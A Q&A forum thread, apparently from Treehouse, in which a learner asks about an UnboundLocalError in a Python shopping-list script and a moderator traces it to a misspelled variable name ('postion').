continue elif new_item.upper() == 'SHOW': show_list() continue else: add_to_list(new_item) show_list() when I import this file it was working but when I entered the item, I got this message Traceback (most recent call last): File "shopping_list_3.py", line 77, in <module> add_to_list(new_item) File "shopping_list_3.py", line 32, in add_to_list position = abs(int(position)) UnboundLocalError: local variable 'position' referenced before assignment I don't know about UnboundLocalError, what's the error on my code and also can you explain the what is UnboundLocalError? Thank you. [MOD: added ```python formatting -cf] 1 Answer Chris FreemanTreehouse Moderator 67,986 Points The else: code block in add_to_list() has a typo: postion = 0 # <- should be position markmneimneh14,132 Points markmneimneh14,132 Points hello try putting you code between ``` followed by html and then ended with ``` it is very hard to read what you have, as is. the ` is under the Esc key thanks
https://teamtreehouse.com/community/i-need-some-help-with-unboundlocalerror
CC-MAIN-2022-27
refinedweb
364
65.12
I currently have a Sphere object in the library, that I instantiate at the start of the game: As you can see from the inspector of the Drone parent object, I have a rigidbody on this object. It does not have a collider. The DroneTrigger object only has a collider on it. I've read that with this setup, the child object's collider will take over for the parent if one of the parent scripts calls OnTriggerEnter. I have yet to make this work as intended. I am trying to hit the DroneTrigger with a bullet object that I'm firing. When I was just using a collider on the Drone object, it worked fine. I want this to eventually allow me to use a second child collider for a different collision. EDIT: I'd like to add that when the player object enters the DroneTrigger trigger, it passes the Player collider fine. It just does not seem to like the one from the Bullet. Before you tell me, I've tried using FixedUpdate on the bullet. this is the DroneTrigger inspector: What is the purpose of the Drone Trigger script? And the Drone script? Can you tell us how you are trying to use OnTriggerEnter? Right now the DroneTrigger script has no code. The Drone script has this: public class Drone : MonoBehaviour { private EnemyManager manager; public int health; public int damage; public float speed; void Awake() { manager = GameObject.Find("SpawnPoint").GetComponent<EnemyManager>(); } // Use this for initialization void Start () { health = 20; speed = 5f; damage = 1; } // Update is called once per frame void Update () { if(manager.target != null) transform.position = Vector3.MoveTowards(transform.position, manager.target.collider.bounds.center, speed * Time.deltaTime); } public void OnTriggerEnter(Collider col) { CollisionManager.BulletTriggerEnter(col, gameObject); } } This function is in CollisionManager: public static void BulletTriggerEnter(Collider otherCollider, GameObject drone) { if(otherCollider != null && drone != null) { if(otherCollider.tag == "Bullet") { otherCollider.GetComponent<Bullet>().Deactivate(); if(drone.GetComponent<Drone>().health <= 0) Destroy(drone); else drone.GetComponent<Drone>().health -= WeaponManager.Damage; } } } Answer by Owen-Reynolds · Oct 04, 2013 at 03:01 PM Triggers don't "understand" compound colliders the way other colliders do (NOTE: Unity v4.01f2.) A fix is to add a "find my parent" to them. As you note, OnCollisionEnter is fine with a rigidbody parent with no collider, but with any number of child non-RB colliders. Hits on any kid count as hits on the parent, and you can check which exact kid it was. In code, collision.transform is the main RB object, and collision.collider is the particular kid. collision.transform collision.collider But, with triggers, they only tell you the particular collider that entered/left/stayed. Even worse, If kid1 enters, and then kid2, they count both -- triggers are too "dumb" to know parentRB + kid1 + kid2 form one compound collider object. A workaround is to find the parent yourself: void OnTriggerEnter(Collider cc) { Transform T = cc.transform; while(T.parent!=null) T=T.parent; Or depending on how objects are set up, go up parents until you get the correct tag, find a rigid body ... . Your method works fine, it's just that I cannot get the trigger to call the OnTriggerEnter function when the Bullet enters the trigger. The Player passes its collider just fine when I run into the Drone object. Again, the Bullet was hitting the trigger when was using just the parent object with a collider and RB. I was able to get the bullet to enter the trigger properly. I didn't realize I had collision between the Bullet layer and the Default layer off. I'm going to add the other colliders/triggers I wanted to add, and see if I have any problems. Answer by SilentSin · Oct 04, 2013 at 01:36 PM The OnTriggerEnter will go to either the object with the Rigidbody or the object with the collider. I'm not sure which, but evidently its the one you aren to detect child object collisions on parent 3 Answers Create a compound collider (beginner) 2 Answers Compound collider does not trigger the parent 1 Answer Odd character controller behavior when a shield object parented to child 0 Answers How to lock the position of a child on collisions? 0 Answers
https://answers.unity.com/questions/548579/how-can-i-get-compound-colliders-to-work-properly.html
CC-MAIN-2020-16
refinedweb
707
55.54
(For more resources on Groovy DSL, see here.) In a nutshell, the term metaprogramming refers to writing code that can dynamically change its behavior at runtime. A Meta-Object Protocol (MOP) refers to the capabilities in a dynamic language that enable metaprogramming. In Groovy, the MOP consists of four distinct capabilities within the language: reflection, metaclasses, categories, and expandos. The MOP is at the core of what makes Groovy so useful for defining DSLs. The MOP is what allows us to bend the language in different ways in order to meet our needs, by changing the behavior of classes on the fly. This section will guide you through the capabilities of MOP. Reflection To use Java reflection, we first need to access the Class object for any Java object in which are interested through its getClass() method. Using the returned Class object, we can query everything from the list of methods or fields of the class to the modifiers that the class was declared with. Below, we see some of the ways that we can access a Class object in Java and the methods we can use to inspect the class at runtime. import java.lang.reflect.Field; import java.lang.reflect.Method; public class Reflection { public static void main(String[] args) { String s = new String(); Class sClazz = s.getClass(); Package _package = sClazz.getPackage(); System.out.println("Package for String class: "); System.out.println(" " + _package.getName()); Class oClazz = Object.class; System.out.println("All methods of Object class:"); Method[] methods = oClazz.getMethods(); for(int i = 0;i < methods.length;i++) System.out.println(" " + methods[i].getName()); try { Class iClazz = Class.forName("java.lang.Integer"); Field[] fields = iClazz.getDeclaredFields(); System.out.println("All fields of Integer class:"); for(int i = 0; i < fields.length;i++) System.out.println(" " + fields[i].getName()); } catch (ClassNotFoundException e) { e.printStackTrace(); } } } We can access the Class object from an instance by calling its Object.getClass() method. If we don't have an instance of the class to hand, we can get the Class object by using .class after the class name, for example, String.class. Alternatively, we can call the static Class.forName, passing to it a fully-qualified class name. Class has numerous methods, such as getPackage(), getMethods(), and getDeclaredFields() that allow us to interrogate the Class object for details about the Java class under inspection. The preceding example will output various details about String, Integer, and Double. Groovy Reflection shortcuts Groovy, as we would expect by now, provides shortcuts that let us reflect classes easily. In Groovy, we can shortcut the getClass() method as a property access .class, so we can access the class object in the same way whether we are using the class name or an instance. We can treat the .class as a String, and print it directly without calling Class.getName(), as follows: The variable greeting is declared with a dynamic type, but has the type java.lang.String after the "Hello" String is assigned to it. Classes are first class objects in Groovy so we can assign String to a variable. When we do this, the object that is assigned is of type java.lang.Class. However, it describes the String class itself, so printing will report java.lang.String. Groovy also provides shortcuts for accessing packages, methods, fields, and just about all other reflection details that we need from a class. We can access these straight off the class identifier, as follows: println "Package for String class" println " " + String.package println "All methods of Object class:" Object.methods.each { println " " + it } println "All fields of Integer class:" Integer.fields.each { println " " + it } Incredibly, these six lines of code do all of the same work as the 30 lines in our Java example. If we look at the preceding code, it contains nothing that is more complicated than it needs to be. Referencing String.package to get the Java package of a class is as succinct as you can make it. As usual, String.methods and String.fields return Groovy collections, so we can apply a closure to each element with the each method. What's more, the Groovy version outputs a lot more useful detail about the package, methods, and fields. When using an instance of an object, we can use the same shortcuts through the class field of the instance. def greeting = "Hello" assert greeting.class.package == String.package Expandos An Expando is a dynamic representation of a typical Groovy bean. Expandos support typical get and set style bean access but in addition to this they will accept gets and sets to arbitrary properties. If we try to access, a non-existing property, the Expando does not mind and instead of causing an exception it will return null. If we set a non-existent property, the Expando will add that property and set the value. In order to create an Expando, we instantiate an object of class groovy.util.Expando. def customer = new Expando() assert customer.properties == [:] assert customer.id == null assert customer.properties == [:] customer.id = 1001 customer.firstName = "Fred" customer.surname = "Flintstone" customer.street = "1 Rock Road" assert customer.id == 1001 assert customer.properties == [ id:1001, firstName:'Fred', surname:'Flintstone', street:'1 Rock Road'] customer.properties.each { println it } The id field of customer is accessible on the Expando shown in the preceding example even when it does not exist as a property of the bean. Once a property has been set, it can be accessed by using the normal field getter: for example, customer.id. Expandos are a useful extension to normal beans where we need to be able to dump arbitrary properties into a bag and we don't want to write a custom class to do so. A neat trick with Expandos is what happens when we store a closure in a property. As we would expect, an Expando closure property is accessible in the same way as a normal property. However, because it is a closure we can apply function call syntax to it to invoke the closure. This has the effect of seeming to add a new method on the fly to the Expando. customer.prettyPrint = { println "Customer has following properties" customer.properties.each { if (it.key != 'prettyPrint') println " " + it.key + ": " + it.value } } customer.prettyPrint() Here we appear to be able to add a prettyPrint() method to the customer object, which outputs to the console: Customer has following properties surname: Flintstone street: 1 Rock Road firstName: Fred id: 1001 (For more resources on Groovy DSL see here.) Categories Adding a closure to an Expando to give a new method is a useful feature, but what if we need to add methods to an existing class on the fly? Groovy provides another useful feature—Categories—for this purpose. A Category can be added to any class at runtime, by using the use keyword. We can create Category classes that add methods to an existing class. To create a Category for class, we define a class containing static methods that take an instance of the class that we want to extend as their first parameter. By convention, we name this parameter as self. When the method is invoked, self is set to the object instance that we are extending. The Category can then be applied to any closure by using the use keyword. class Customer { int id String firstName String surname String street String city } def fred = new Customer(id:1001,firstName:"Fred", surname:"Flintstone", street:"1 Rock Road",city:"Bedrock") def barney = new Customer(id:1002,firstName:"Barney", surname:"Rubble", street:"2 Rock Road",city:"Bedrock") def customerList = [ fred, barney] class CustomerPrinter { static void prettyPrint(Customer self) { println "Customer has following properties" self.properties.each { if (it.key != 'prettyPrint') println " " + it.key + ": " + it.value } } } use (CustomerPrinter) { for (customer in customerList) customer.prettyPrint() } Java libraries are full of classes that have been declared final. The library designers in their wisdom have decided that the methods they have added are all that we will ever need. Unfortunately, that is almost never the case in practice. Take the Java String class, for example. There are plenty of useful string manipulation features that we might like to have in the String class. Java has added methods progressively to this class over time: for instance, match and split in Java 1.4, with replace and format being added in Java 1.5. If we needed these style methods before Sun got around to adding them, we could not do it ourselves because of the final modifier. So the only option has been to use classes from add-on libraries such as Commons StringUtils. The Apache Commons Lang component class contains a slew of useful classes that augment the basic capabilities of Java classes, including BooleanUtils, StringUtils, DateUtils, and so on. All of the util class methods are implemented as static, taking String as the first parameter. This is the typical pattern used in Java when we need to mix in extra functionality to an existing class. import org.apache.commons.lang.StringUtils; public class StringSplitter { public static void main(String[] args) { String [] splits = StringUtils.split(args[0], args[1]); for (int i = 0; i < splits.length; i++) { System.out.println("token : " + splits[i]); } } } Conveniently, this pattern is the same as the one used Groovy categories, which means that the Apache Commons Lang Util classes can all be dropped straight into a use block. So all of these useful utility classes are ready to be used in your Groovy code as Categories. import org.apache.commons.lang.StringUtils use (StringUtils) { "org.apache.commons.lang".split(".").each { println it } } Metaclass In addition to the regular Java Class object that we saw earlier when looking at reflection, each Groovy object also has an associated MetaClass Object. All Groovy classes secretly implement the groovy.lang.GroovyObject interface, which exposes a getMetaClass() method for each object. public interface GroovyObject { /** * Invokes the given method. */ Object invokeMethod(String name, Object args); /** * Retrieves a property value. */ Object getProperty(String propertyName); /** * Sets the given property to the new value. */ void setProperty(String propertyName, Object newValue); /** * Returns the metaclass for a given class. */ MetaClass getMetaClass(); /** * Allows the MetaClass to be replaced with a * derived implementation. */ void setMetaClass(MetaClass metaClass); } Pure Java classes used in Groovy do not implement this interface, but they have a MetaClass assigned anyway. This MetaClass is stored in the MetaClass registry. Earlier versions of Groovy required a look-up in the registry to access the MetaClass. Since Groovy 1.5, the MetaClass of any class can be found by accessing its .metaClass property. class Customer { int id String firstName String surname String street String city } // Access Groovy meta class def groovyMeta = Customer.metaClass // Access Java meta class from 1.5 def javaMeta = String.metaClass // Access Groovy meta class prior to 1.5 def javaMetaOld = GroovySystem.metaClassRegistry.getMetaClass(String) Metaclasses are the secret ingredients that make the Groovy language dynamic. The MetaClass maintains all of the metadata about a Groovy class. This includes all of its available methods, fields, and properties. Unlike the Java Class object, the Groovy MetaClass allows fields and methods to be added on the fly. So while the Java class can be considered as describing the compile time behavior of the class, the MetaClass describes its runtime behavior. We cannot change the Class behavior of an object but we can change its MetaClass behavior by adding properties or methods on the fly. The Groovy runtime maintains a single MetaClass per Groovy class, and these operate in close quarter with the GroovyObject interface. GroovyObject implements a number of methods, which in their default implementations are just facades to the equivalent MetaClass methods. The most important of these to understand is the invokeMethod(). Pretended methods (MetaClass.invokeMethod) An important distinction between Java and Groovy is that in Groovy a method call never invokes a class method directly. A method invocation on an object is always dispatched in the first place to the GroovyObject.invokeMethod() of the object. In the default case, this is relayed onto the MetaClass.invokeMethod() for the class and the MetaClass is responsible for looking up the actual method. This indirect dispatching is the key to how a lot of Groovy power features work as it allows us to hook ourselves into the dispatching process in interesting ways. class Customer { int id String firstName String surname String street String city Object invokeMethod(String name, Object args) { if (name == "prettyPrint") { println "Customer has following properties" this.properties.each { println " " + it.key + ": " + it.value } } } } def fred = new Customer(id:1001,firstName:"Fred", surname:"Flintstone", street:"1 Rock Road",city:"Bedrock") def barney = new Customer(id:1002,firstName:"Barney", surname:"Rubble", street:"2 Rock Road",city:"Bedrock") def customerList = [ fred, barney] customerList.each { it.prettyPrint() } Above, we added a Customer.invokeMethod() to the Customer class. This allows us to intercept method invocations and respond to calls to Customer.prettyPrint() even though this method does not exist. Remember how in GroovyMarkup we appeared to be calling methods that did not exist? This is the core of how GroovyMarkup works. The Customer.prettyPrint() method in the previous code snippet is called a pretended method. Understanding this, delegate, and owner Like Java, Groovy has a this keyword that refers to the "current" or enclosing Java object. In Java, we don't have any other context that we can execute code in except a class method. In an instance method, this will always refer to the instance itself. In a static method, this has no meaning as the compiler won't allow us to reference this in a static context. In addition to the instance methods, Groovy has three additional execution contexts to be aware of: - Code running directly within a script where the enclosing object is the script. - Closure code where the enclosing object is either a script or an instance object. - Closure code where the enclosing object is another closure. - The owner keyword refers to the enclosing object, which in the majority of cases is the same as this, the only exception being when a closure is surrounded by another closure. - The delegate keyword refers to the enclosing object and is usually the same as owner except that delegate is assignable to another object. Closures relay method invocations that they handle themselves back to their delegate. This is how the methods of an enclosing class become available to be called by the closure as if the closure was also an instance method. We will see later that one of the reasons builders work the way they do is because they are able to assign the delegate of a closure to themselves. In addition to the this keyword, Groovy has two other keywords that are referred only in the context of a closure—owner and delegate. The delegate will initially default to owner, except when we explicitly change the delegate to something else through the Closure.setDelegate method. The following example illustrates this, owner, and delegate working under various different contexts. This example is necessarily complex, so take the time to read and understand it. class Clazz { void method() { println "Class method this is : " + this.class } void methodClosure() { def methodClosure = { println "Method Closure this is : " + this.class assert owner == this assert delegate == this } methodClosure() } } def clazz = new Clazz() clazz.method() def closure = { self -> println "Closure this is : " + this.class assert this == owner assert delegate == clazz def closureClosure = { println "Closure Closure this is : " + this.class assert owner == self assert delegate == self } assert closureClosure.delegate == self closureClosure() } closure.delegate = clazz closure(closure) clazz.methodClosure() println this.class Running the preceding code will output the following text: Class method this is : class Clazz Closure this is : class ConsoleScript1 Closure Closure this is : class ConsoleScript1 Method Closure this is : class Clazz Script this is : class ConsoleScript1 So the rules for resolving this, owner, and delegate in the various contexts are: - In a class instance method, this is always the instance object. owner and delegate are not applicable and will be disallowed by the compiler. - In a class static method, this, owner, and delegate references will be disallowed by the compiler. - In a closure defined within a script, this, owner, and delegate all refer to the Script object unless delegate has been reassigned. - In a closure within a method, this and owner refer to the instance object of the enclosing class; as will delegate, unless it has been reassigned to another object. - In a script, this is the Script object, and owner and delegate are not applicable. Summary In this article, we covered the Meta Object Protocol (MOP) of the Groovy language. We now have an appreciation of what can be achieved by using features in the MOP. Further resources on this subject: - The Grails Object Relational Mapping (GORM) [article] - Modeling Relationships with GORM [article]
https://www.packtpub.com/books/content/metaprogramming-and-groovy-mop
CC-MAIN-2015-40
refinedweb
2,795
57.16
I have a new PHP class which I would like to call from a Controller. Where, in the CakePHP folder structure, should I place this new class and what is the procedure to invoke or make use of it from a controller? Thanks in advance for your cooperation! From my point of view, you can reuse any own class and also any third parties class as a utility class. If so, then you can place the class into src/Utility folder. Please use the proper namespace. After that, you can use that class anywhere in CakPHP 3.x. HOW TO PLACE: Say, you have a class named Jorge, save it into src/Utility folder using file name Jorge.php. Put namespace App\Utility; statement top of your Jorge.php file. HOW TO USE: In which file you want to use this class, just put use App\Utility\Jorge;. After that, you can call the class into that file. ALTERNATIVE SOLUTION: If you have a third party package of many classes, then you can follow
https://codedump.io/share/cnqNHYx39P8p/1/where-to-place-a-custom-php-class-in-cakephp-3
CC-MAIN-2017-39
refinedweb
174
82.85
In this tutorial, we will learn how to get the current date and time from the NTP server with the ESP32 development board and Arduino IDE. In the data logger applications, the current date and timestamp are useful to log values along with timestamps after a specific time interval. The time.h header file provides current updated date and time. We can update drift in RTC time using NTP server. We have a similar guide with ESP8266 NodeMCU: Getting Current Date and Time with ESP8266 NodeMCU using NTP Server Why we need to use Current Date and Time? Several times, in electronic projects we are required to work with the current time like displaying it to the user or performing certain operations at a particular time. Therefore, it is adamant to access the precise time which is not possible to obtain accurately through the generic Real-time clock (RTC) chips. Thus, a better more precise solution is to use the central server via the Internet to receive the date and time. NTP server which is widely used worldwide provides timestamps with a precision of approximately a few milliseconds of the Coordinated Universal Time (UTC) without any supplementary hardware setup and costs. We will use the Network Time Protocol (NTP) server to request the current date and. NTP Server Architecture The NTP Server is based on a hierarchical structure consisting of three levels where each level is known as the stratum. In the first level (Stratum 0) there are highly precise atomic/radio clocks that provide the exact time. The second level (Stratum 1) is directly connected with the first level and thus contains the most precise time available which it receives from the first level. The third and last level (Stratum 2) is the device that makes the request to the NTP server for the date/time from the second level. In the hierarchy, each level synchronizes with the level above it. NTP Server Working To get the date and time with our. The ESP32 will send a request to the server after the connection will be established. When the NTP receives the request, it will transmit the time stamp containing the information regarding the time and date. Getting Date & Time from the NTP Server We will upload a program code in our ESP32 board using Arduino IDE which will connect to the NTP server through our local network and we will request the current date and time. These values will then get displayed on our serial monitor automatically. One thing to take into account while accessing the time for your time zone is to look for the daylight savings and the Coordinated Universal Time (UTC) offset. If your country observes the daylight savings (click here to check) then you will have to incorporate it in the program code by adding 3600 (in seconds) otherwise it will be replaced by a 0. Pakistan does not observe daylight savings so we will add 0 in the daylight offset variable in the code. For the UTC offset, click here to check for your time zone and add the offset in the program code by converting it in seconds. For example, for the United States the UTC is -11:00 so converting it in seconds it becomes: -39600 (-11*60*60). For Pakistan, the UTC offset is +05:00 so in our code, we will specify the GMT offset which is the same as the UTC offset in seconds as 18000 (5*60*60). Preparing Arduino IDE Open your Arduino IDE and make sure you have the ESP32 add-on already installed in it. Recommended Reading: Install ESP32 in Arduino IDE ( Windows, Linux, and Mac OS) Now go to File > New and open a new file. Copy the code given below in that file and then save it. Arduino Sketch #include <WiFi.h> #include "time.h" const char* ssid = "SSID_NAME"; //Replace with your own SSID const char* password = "YOUR_PASSWORD"; //Replace with your own password const char* ntpServer = "pool.ntp.org"; const long gmtOffset_sec = 18000; //Replace with your GMT offset (seconds) const int daylightOffset_sec = 0; //Replace with your daylight offset (seconds) void setup() { Serial.begin(115200); //connect to WiFi Serial.printf("Connecting to %s ", ssid); WiFi.begin(ssid, password); while (WiFi.status() != WL_CONNECTED) { delay(500); Serial.print("."); } Serial.println("CONNECTED to WIFI"); /info, "%A, %B %d %Y %H:%M:%S"); } How the Code Works? In this section, we will understand how the code will work. First, we will define the necessary libraries at the start of the code. We will define two libraries: WiFi.h and time.h. The first library is required so that our ESP32 board can connect with the local WIFI network and hence connect with the NTP server. Also, the time library will help us to achieve the NTP synchronization and get the time. #include <WiFi.h> #include "time.h" Then, we will create two global variables of type char which will hold the network credentials through which our ESP32 module will connect. These are named ssid and password. To ensure a successful connection, replace their values with your network credentials. const char* ssid = "SSID_NAME"; const char* password = "YOUR_PASSWORD"; Next, we will define three more variables, one for the NTP server which we will specify as “pool.ntp.org” and the two others for the GMT and the daylight offset in seconds. We have specified the offsets for Pakistan but you can change them according to your time zone to obtain the correct time. const char* ntpServer = "pool.ntp.org"; const long gmtOffset_sec = 18000; //Replace with your GMT offset (seconds) const int daylightOffset_sec = 0; //Replace with your daylight offset (seconds) Inside our setup() function, we will initialize the serial communication at a baud rate of 112500 as we want to display the current date and time on our serial monitor by using serial.begin(). Serial.begin(115200); The following section of code connects the ESP32 module with the local network. We will call WiFi.begin() and pass the SSID and password variables inside it which we defined before. After a successful connection has been established, the serial monitor will display the message “CONNECTED to WIFI”. Serial.printf("Connecting to %s ", ssid); WiFi.begin(ssid, password); while (WiFi.status() != WL_CONNECTED) { delay(500); Serial.print("."); } Serial.println("CONNECTED to WIFI"); Next, we will use the configTime() function and pass three arguments inside it. The arguments will be the GMT offset, the daylight offset and the NTP server respectively. All of these three values were already defined by us. configTime(gmtOffset_sec, daylightOffset_sec, ntpServer); printLocalTime() void printLocalTime() { struct tm timeinfo; if(!getLocalTime(&timeinfo)){ Serial.println("Failed to obtain time"); return; } Serial.println(&timeinfo, "%A, %B %d %Y %H:%M:%S"); } Inside our infinite loop function, we will call the printLocalTime() function which will display the current time and date on our serial monitor. We will define this function by first creating a time structure named timeinfo. This will hold all the information relating to the time e.g., the number of hours/minutes/seconds. Then, we will use the getLocaltime() function to transfer our request to the NTP server and analyze the time stamp which will be received in a human-readable format. Notice that we are passing the time structure as a parameter inside this function. By accessing the members of this time structure (timeinfo) we will acquire the current date and time which we will print on our serial monitor. The table shows the specifiers which we can use to access a particular configuration of the date/time. We will access the full weekday name, the full name of the month, day of the month, the year, the hour in the 24-h format: Minute: Second in a single line and display on our serial monitor through the line which is given below. Serial.println(&timeinfo, "%A, %B %d %Y %H:%M:%S"); Demonstration After uploading the Arduino sketch to your ESP32 module press the ENABLE button. Now open your serial monitor and you will be able to see the current date and the time after every 1 second. Conclusion In conclusion, with the help of the NTP server, we can easily obtain the current time and date through our ESP32 development board which is connected with a stable WIFI connection. You can view further articles regarding Epoch time by accessing the links below: - Getting Epoch/Unix time with ESP8266 NodeMCU through NTP server using Arduino IDE - Getting Epoch/Unix time with ESP32 through NTP server using Arduino IDE
https://microcontrollerslab.com/getting-current-date-time-esp32-arduino-ide-ntp-server/
CC-MAIN-2021-39
refinedweb
1,417
62.38
Rhombus is a simple quadrilateral whose four sides all have the same length. And perimeter of rhombus can be found by two methods. A quadrilateral has two diagonal and based on the length of diagonals the area and perimeter of the quadrilateral can be found. To find the perimeter of a rhombus using its diagonals is 2{√(d1)2 + (d2)2 } LOGIC − To find the perimeter of a rhombus using its diagonals. You need the formula 2{√(d1)2 + (d2)2 } for this in your code you need to use the math class that supports the use of squareRoot and square of the number. The Below code display Program to find the perimeter of rhombus using its diagonals. #include <stdio.h> #include <math.h> int main(){ int d1 = 3, d2= 4, perimeter; perimeter = (2 * sqrt(pow(d1,2)+pow(d2,2))); printf("perimeter is %d", perimeter); return 0; } perimeter is 10
https://www.tutorialspoint.com/program-to-find-the-perimeter-of-a-rhombus-using-diagonals
CC-MAIN-2021-39
refinedweb
151
71.14
This is your resource to discuss support topics with your peers, and learn from each other. 02-04-2013 11:43 AM Hi, I have a project that makes references to other projects in the workspace. Is there any way to reference those projects so I can avoid doing thinks like this: #include "../Screens/MainMenuScene.h" and I can do this instead? #include "MainMenuScene.h" thanks. JB Solved! Go to Solution. 02-04-2013 11:53 AM 02-04-2013 12:01 PM is that the same than doing: properties -> c/c++ build -> settings -> preprocessor? thanks 02-04-2013 12:17 PM It depends which type of a project you use - managed or not, but basically yes, the same.
http://supportforums.blackberry.com/t5/Native-Development/Relative-paths-to-h-includes/m-p/2134647
CC-MAIN-2015-27
refinedweb
119
81.93
import from FreeBSD RELENG_4 1.5.2.1 /*- *) #if 0 static char sccsid[] = "@(#)freopen.c 8.1 (Berkeley) 6/4/93"; #endif static const char rcsid[] = "$FreeBSD: src/lib/libc/stdio/freopen.c,v 1.5.2.1 2001/03/05 10:54:53 obrien Exp $"; #endif /* LIBC_SCCS and not lint */ #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <errno.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include "libc_private.h" #include "local.h" /* * Re-direct an existing, open (probably) file to some other file. * ANSI is written such that the original file gets closed if at * all possible, no matter what. */ FILE * freopen(file, mode, fp) const char *file, *mode; FILE *fp; { int f; int flags, isopen, oflags, sverrno, wantfd; if ((flags = __sflags(mode, &oflags)) == 0) { (void) fclose(fp); return (NULL); } FLOCKFILE(fp); if (!__sdidinit) __sinit(); /* *); }
http://www.dragonflybsd.org/cvsweb/src/lib/libc/stdio/freopen.c?rev=1.1;content-type=text%2Fx-cvsweb-markup
CC-MAIN-2014-35
refinedweb
143
72.73
To get you started with Python (MicroPython) syntax, we’ve provided you with a number of code examples. As with Python 3.5, variables can be assigned to and referenced. Below is an example of setting a variable equal to a string and then printing it to the console. variable = "Hello World" print(variable) Conditional statements allow control over which elements of code run depending on specific cases. The example below shows how a temperature sensor might be implemented in code. temperature = 15 target = 10 if temperature > target: print("Too High!") elif temperature < target: print("Too Low!") else: print("Just right!") Loops are another important feature of any programming language. This allows you to cycle your code and repeat functions/assignments/etc. for loops allow you to control how many times a block of code runs for within a range. x = 0 for y in range(0, 9): x += 1 print(x) while loops are similar to for loops, however they allow you to run a loop until a specific conditional is true/false. In this case, the loop checks if x is less than 9 each time the loop passes. x = 0 while x < 9: x += 1 print(x) Functions are blocks of code that are referred to by name. Data can be passed into it to be operated on (i.e. the parameters) and can optionally return data (the return value). All data that is passed to a function is explicitly passed. The function below takes two numbers and adds them together, outputting the result. def add(number1, number2): return number1 + number2 add(1, 2) # expect a result of 3 The next function takes an input name and returns a string containing a welcome phrase. def welcome(name): welcome_phrase = "Hello, " + name + "!" print(welcome_phrase) welcome("Alex") # expect "Hello, Alex!" Python has a number of different data structures for storing and manipulating variables. The main difference (regarding data structures) between C and Python is that Python manages memory for you. This means there’s no need to declare the sizes of lists, dictionaries, strings, etc. A data structure that holds an ordered collection (sequence) of items. networks = ['lora', 'sigfox', 'wifi', 'bluetooth', 'lte-m'] print(networks[2]) # expect 'wifi' A dictionary is like an address-book where you can find the address or contact details of a person by knowing only his/her name, i.e. keys (names) are associate with values (details). address_book = {'Alex':'2604 Crosswind Drive','Joe':'1301 Hillview Drive','Chris':'3236 Goldleaf Lane'} print(address_book['Alex']) # expect '2604 Crosswind Drive' Similar to lists but are immutable, i.e. you cannot modify tuples after instantiation. pycom_devices = ('wipy', 'lopy', 'sipy', 'gpy', 'fipy') print(pycom_devices[0]) # expect 'wipy' For more Python examples, check out these tutorials. Be aware of the implementation differences between MicroPython and Python 3.5.
https://docs.pycom.io/gettingstarted/programming/examples/
CC-MAIN-2019-47
refinedweb
467
57.77
CodePlexProject Hosting for Open Source Software I want to display the most recent blog posts or their headlines from my BlogEngine blog onto my website's homepage (isn't built using BlogEngine.net). This link: explains how to display content outside of wordpress on your website. What is the best way to display blog content on your website's homepage when using BlogEngine? Depends on your other site. If it is asp.net, you might be able directly reference BlogEngine and loop through the posts similar to what described in that article. If it is PHP or something else, you might need to expose your posts via web service. As last resort, you can always screen scrape your BE posts, which is ugly but works across any platform. My website is .asp on IIS 6 with .net support. I noticed that the syndication.axd output has all of the xml I need to display the most recent posts. Is there a way to read the syndication output? I would like to do something like the following (obviously doesn't work): <% 'Load XML set xml = Server.CreateObject("Microsoft.XMLDOM") xml.async = false xml.load(Server.MapPath("blogengine/syndication.axd")) 'Load XSL set xsl = Server.CreateObject("Microsoft.XMLDOM") xsl.async = false xsl.load(Server.MapPath("blog_links.xsl")) 'Transform file 'Response.Write(xml.transformNode(xsl)) %> Thanks in advance There's already some code in BE that reads RSS feeds. One that comes to mind is the BlogRoll (in the App_Code\Controls\Blogroll.cs) file. And if you're using ASP.NET 3.5, it includes some new built-in namespaces to consume (and publish) RSS. Here's one article demonstrating the new capabilities. Thanks for all of your help Are you sure you want to delete this post? You will not be able to recover it later. Are you sure you want to delete this thread? You will not be able to recover it later.
http://blogengine.codeplex.com/discussions/72488
CC-MAIN-2017-22
refinedweb
322
69.28
4 SQL Developer: Unit Testing The SQL Developer unit testing feature provides a framework for testing PL/SQL objects, such as functions and procedures, and monitoring the results of such objects over time. You create tests, and for each you provide information about what is to be tested and what result is expected. The SQL Developer implementation of unit testing is modeled on the classic and well known xUnit collection of unit test frameworks. The unit testing feature is part of the support within the SQL Developer family of products for major parts of the life cycle of database system development, from design (provided by Data Modeler) to development to testing. This topic contains the following topics: - SQL Developer User Interface for Unit Testing - Editing and Running a Unit Test Using a Dynamic Value Query to Create a Unit Test Using Lookups to Simplify Unit Test Creation Using Variable Substitution in Validation Actions - - Exporting and Importing Unit Test Objects Command-Line Interface for Unit Testing Unit Testing Best Practices Example of Unit Testing (Tutorial) 4.1 Overview of Unit Testing The SQL Developer unit testing framework involves a set of sequential steps for each test case. The steps are as follows, including the user input for before the step is run and the framework activities for the step while the test is being run. Identify the object to be tested. User Input: Identify the object, such as a specific PL/SQL procedure or function. Framework Activities: Select the object for processing. Perform any startup processing. User Input: Enter the PL/SQL block, or enter NULL for no startup processing. Framework Activities: Execute the block. Run the unit test object. User Input: (None.) Framework Activities: Execute the unit test. Check and record the results. User Input: Identify the expected return (result), plus any validation rules. Framework Activities: Check the results, including for any validation, and store the results. Perform any end processing (teardown). User Input: Enter the PL/SQL block, or enter NULL for no teardown activities. Framework Activities: Execute the block. For each test, you enter the information called for in the preceding steps, to create a test case. A unit test is a group of test cases (one or more) on a specific PL/SQL object. Each test case is an implementation. Each unit test has at least one implementation (named Default by default); however, you can add one or more other implementations. For example, you can have implementations that test various combinations of parameter values, including those that generate exceptions. When a unit test is run, each implementation is run one after the other. Each implementation runs the startup action (if any) for the test, then the test implementation itself, and then the teardown action (if any). The difference between implementations is in the values of the calling arguments. Any dynamic value query is evaluated before the execution of all of the implementations, including before any startup action. You can group unit tests into a test suite to be run as a grouped item, and the test suite can have its own startup and end processing in addition to any specified for test cases and unit tests. To learn more about unit testing with SQL Developer, take whichever approach suits your preference: Go to Example of Unit Testing (Tutorial) and follow the steps, and then return to read the remaining conceptual information under SQL Developer: Unit Testing. Or Read the remaining conceptual information under SQL Developer: Unit Testing, finishing with Example of Unit Testing (Tutorial). Related Topics 4.2 SQL Developer User Interface for Unit Testing The SQL Developer user interface for unit testing includes the Unit Test navigator, the Unit Test submenu, and other features. Figure 4-1 shows the Unit Test navigator, which includes the top-level nodes Library, Lookups, Reports, Suites, and Tests. (If this navigator is not visible, click View, then Unit Test.) Figure 4-1 Unit Test Navigator Description of 